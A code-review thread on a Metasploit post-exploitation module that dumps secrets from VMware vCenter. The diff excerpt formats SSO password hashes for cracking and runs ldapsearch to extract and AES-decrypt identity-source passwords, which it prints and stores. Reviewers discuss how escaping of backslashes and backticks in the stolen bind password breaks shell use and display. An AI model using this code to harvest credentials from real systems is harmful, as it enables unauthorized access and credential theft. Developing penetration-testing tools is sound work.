modules/post/linux/gather/vcenter_secrets_dump.rb

```diff
@@ -0,0 +1,883 @@
+
+      case type
+      when 1
+        unless hash.length == 128
+          vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
+          next
+        end
+
+        unless salt.length == 32
+          vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
+          next
+        end
+
+        # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
+        john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
+      else
+        vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
+        next
+      end
+
+      print_good("vSphere SSO User Credential: #{dn}:#{john_hash}")
+
+      create_credential(service_details.merge(
+        username: dn,
+        private_data: john_hash,
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(john_hash)
+      ))
+    end
+  end
+
+  def process_sso_providers(entries)
+    if entries.empty?
+      print_warning('No SSO ID provider information found')
+      return
+    end
+
+    if entries.is_a?(String)
+      entries = entries.split("\n")
+    end
+
+    entries.each do |entry|
+      sso_prov_type = entry[:vmwSTSProviderType].first
+      sso_conn_str = entry[:vmwSTSConnectionStrings].first
+      sso_user = entry[:vmwSTSUserName].first
+
+      # On vCenter 7.x instances the tenant AES key was always Base64 encoded vs. plaintext, and vmwSTSPassword was missing from the LDIF dump.
+      # It appears that vCenter 7.x does not return vmwSTSPassword even with appropriate LDAP flags - this is not like prior versions.
+      # The data can still be extracted directly with ldapsearch syntax below which works in all versions, but is a PITA.
+      vmdir_user_sso_pass = cmd_exec("#{ldapsearch_bin} -h #{vc_psc_fqdn} -LLL -p 389 -b \"cn=#{base_fqdn},cn=Tenants,cn=IdentityManager,cn=Services,#{base_dn}\" -D \"#{bind_dn}\" -w #{shell_bind_pw} \"(&(objectClass=vmwSTSIdentityStore)(vmwSTSConnectionStrings=#{sso_conn_str}))\" \"vmwSTSPassword\" | awk -F 'vmwSTSPassword: ' '{print $2}'").split("\n").last
+      sso_pass = tenant_aes_decrypt(vmdir_user_sso_pass)
+
+      sso_domain = entry[:vmwSTSDomainName].first
+
+      sso_conn_uri = URI.parse(sso_conn_str)
+
+      extra_service_data = {
+        address: Rex::Socket.getaddress(rhost),
+        port: sso_conn_uri.port,
+        service_name: sso_conn_uri.scheme,
+        protocol: 'tcp',
+        workspace_id: myworkspace_id,
+        module_fullname: fullname,
+        origin_type: :service,
+        realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+        realm_value: sso_domain
+      }
+
+      store_valid_credential(user: sso_user, private: sso_pass, service_data: extra_service_data)
+      print_status('Found SSO Identity Source Credential:')
+      print_good("#{sso_prov_type} @ #{sso_conn_str}:")
+      print_good("\t  SSOUSER: #{sso_user}")
+      print_good("\t  SSOPASS: #{sso_pass}")
```

Comment:
@h00die @npm-cesium137-io I came across a Vcenter today, where a password contains a single `\`, however the module printed  `\\`. I'll debug tomorrow at which stage we shall de-escape.

Reply:
@h00die: Correction. The password I got wrongly on screen is not the above but this one: `print_good("vSphere SSO DC PW: #{bind_pw}")` coming from `get_domain_dc_password` of `lib/msf/core/post/vcenter/vcenter.rb`. 
The string grepped from registry is already backslash escaped, Which works well for `self.shell_bind_pw` (and later use in shell comand), but for the screen and for `store_valid_credential` we shall de-escape it. 
Example:
- on screen and stored as credential: `vSphere SSO DC PW: Password\\123`
- the actual password is: ` Password\123`
Other special characters might be in theory escaped too though.

Reply:
funny update. My bind password has a backtick too, which is for bash a special character, so apart of escaping `"` via `self.bind_pw = bind_pw.gsub('"') { '\\"' }` we shall escape the backtick too for the `shell_bind_pw` variable. 
Besides I believe escaping `"`  and backtick shall be made for `shell_bind_pw` only and not for `bind_pw` which is printed and stored as credential.